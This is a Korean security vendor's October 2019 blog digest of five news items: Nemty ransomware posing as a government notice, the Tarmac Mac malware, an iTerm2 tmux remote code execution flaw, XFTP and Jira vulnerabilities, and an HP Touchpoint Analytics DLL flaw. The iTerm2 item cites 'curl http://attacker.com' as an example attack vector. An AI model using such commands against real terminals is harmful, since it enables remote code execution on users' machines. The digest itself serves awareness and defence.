Wins blog

글로벌 정보보안 파트너! Global Security  No.1 윈스는 국가대표 정보보안 기업에서 글로벌 강소기업으로 도약합니다.

보안 정보

앞 내용 보기 다음 내용 보기
보안 동향[2019년 10월 14일] 주요 보안 이슈
작성일 2019-10-14 조회 177

1. [기사] 공정거래위원회 사칭 Nemty 랜섬웨어 V1.6 대량 살포중…'비너스락커' 조직 소행
[https://www.dailysecu.com/news/articleView.html?idxno=73557]
10일부터 "전자상거래 위반행위 조사통지서"로 위장해 Nemty 랜섬웨어가 유포되고 있는 정황이 포착되었다. 비너스락커(VenusLocker) 조직의 소행으로 추정되며, 정부 공문 포맷 이미지를 이용해 현재 대량으로 유포되고 있어 사용자들의 각별한 주의가 필요하다. 메일의 첨부파일은 7z 형식으로 압축되어 있었으며 압축파일 내부에는 PDF 문서로 위장한 악성 EXE 실행 파일이 포함되어 있으며, 기존과 동일하게 파일명에 긴 공백을 넣어 PDF 파일인 것처럼 위장해 사용자를 속이려 시도했다. 따라서 해당 메일을 받은 담당자가 공정거래위원회에서 온 내용으로 착각해 파일을 클릭하면 Nemty 랜섬웨어에 감염되고, 바탕화면에는 Nemty 랜섬웨어에 감염되었음을 알리는 랜섬노트가 팝업된다. 또한, 랜섬노트 상단에 "NEMTY PROJECT V1.6"라는 문구가 있는 것이 특징이며, 그 외에는 1.5 버전 특징과 동일하다.


2. [기사] A new Mac malware dubbed Tarmac has been distributed via malvertising campaigns
[https://securityaffairs.co/wordpress/92441/malware/mac-malware-tarmac.html]
미국, 이탈리아 및 일본의 멀버타이징 캠페인을 통해 배포 된 Tarmac이라는 새로운 Mac 악성코드를 발견했다. 악의적인 광고는 일단 실행되면 OSX/Shayer MacOS 멀웨어를 먼저 설치한 다음 최종 페이로드(payload)를 실행하는 OSX/Tarmac을 설치하는 팝업 소프트웨어 업데이트(주로 Adobe Flash Player 업데이트)를 보여주는 사이트로 피해자를 리디렉션한다. 악성코드 개발자는 애플 개발자 인증서로 악성코드에 서명을 하는데, 이는 Gatekeeper 및 XProtect와 같은 보안 보호를 우회할 수 있다. Shlayer와 Tarmac을 배포하는 해당 멀버타이징 캠페인은 1월에 시작되었지만, 전문가들은 Tarmac 악성 코드를 발견하지 못했다. Tarmac은 Shlayer 감염의 2단계 페이로드로 작용하고, 전문가들은 분석 시 C2 서버가 종료되었으며 분석한 샘플이 비교적 오래되었다고 지적했다. 그리고 전문가들은 캠페인이 여전히 진행 중이며 위협 행위자가 인프라를 변경했을 것으로 추측한다. 

 

3. [기사] iTerm2 맥OS 터미널 앱, 2012년부터 존재해온 RCE 취약점에 영향 받아
[https://www.dailysecu.com/news/articleView.html?idxno=73553]
ROS(Raically Open Security) 보안 전문가가 GPL 라이센스 iTerm2 macOS 터미널 에뮬레이터 앱에서 7년 된 중요한 원격 코드 실행 취약점을 발견했다. CVE-2019-9535로 추적된 RCE 결함은 모질라 오픈소스 지원 프로그램(MOSS, Mozilla Open Source Support)의 지원을 받는 독립적인 보안 감사의 일부로 발견되었다. 원격 코드 실행 취약점은 iTerm2의 tmux 통합 기능에 존재하고, 공격자는 악성 출력을 터미널에 제공하여 임의 명령을 실행하는데 악용할 수 있다. 가능한 공격 벡터는 공격자가 제어하는 ssh 서버 또는 curl http://attacker.com과 tail -f /var/log/apache2/referer_log와 같은 명령어이다. 또한, 모질라는 일반적으로 이 취약점은 어느 정도의 사용자 상호작용이나 속임수가 필요하지만, 안전하다고 간주하는 명령을 통해 악용할 수 있기 때문에 잠재적 영향력에 대한 우려가 있다고 말했다.


4. [기사] 많은 기업들의 최애 SW 'XFTP'와 '지라', 보안 취약점으로 긴급 업데이트
[https://www.boannews.com/media/view.asp?idx=83757&page=1&kind=1]
최근 국내에서 많이 사용되는 넷사랑의 FTP 프로그램인 XFTP Client 제품과 전 세계적으로 유명한 아틀라시안의 지라(Jira) 프로그램에서 보안 취약점이 잇따라 발견돼 해당 업체들에서 긴급하게 보안 업데이트에 나섰다. 먼저 넷사랑 사의 XFTP Client 제품에서 발견된 버퍼 오버플로우 취약점은 공격자가 제어 가능한 FTP 서버의 파일을 다운로드할 때 파일명을 복사하는 과정에서 버퍼 오버플로우가 발생하여 임의 코드를 실행할 수 있는 취약점(CVE-2019-17320)이다. XFTP Client 6.0149 이전 버전은 해당 취약점에 영향을 받게 되며, 넷사랑 홈페이지를 참고하여 보안 패치를 적용한 XFTP 6.0150 이상 버전으로 업데이트를 수행해야 한다. 또한, 아틑란시안 사의 지라(Jira) 제품의 정보 노출 취약점을 해결한 보안 업데이트도 발표됐다. 해당 취약점은 고객 포탈(Customer Portal)에 접근이 가능한 공격자가 경로 이동(Path Traversal) 취약점을 통해 관리자 포탈에 접근할 수 있는 취약점(CVE-2019-14994)이다. 

 

5. [기사] Tens of million PCs potentially impacted by a flaw in HP Touchpoint Analytics
[https://securityaffairs.co/wordpress/92392/hacking/hp-touchpoint-analytics-flaw.html]
SafeBreach의 보안 연구자들은 HP Touchpoint Analytics 서비스가 CVE-2019-6333으로 추적된 심각한 결함에 의해 영향을 받는다는 것을 발견했다. TouchPoint Analytics는 공급 업체가 하드웨어 성능에 대한 진단 데이터를 익명으로 수집할 수 있는 서비스이며 대부분의 HP PC에 사전 설치되어 있다. 전문가들은 서비스가 시작되면 누락된 DLL 파일 3개를 로드하려고 시도한다는 것을 확인했다. 대상 시스템에 대한 관리 권한을 가진 공격자는 누락된 파일의 이름을 가진 악의적인 DLL을 만들어 HP 서비스가 시작될 때 실행될 것으로 예상된 위치에 배치할 수 있다. 해당 취약점은 HP Touchpoint Analytics 또는 Open Hardware Monitor를 실행하는 수천만 대의 컴퓨터에 영향을 미칠 수 있다. HP는 4.1.4.2827 버전을 출시하면서 해당 결함을 해결했다.

첨부파일 첨부파일이 없습니다.
태그 Nemty  Tarmac  XFTP  Jira  HP Touchpoint Analytics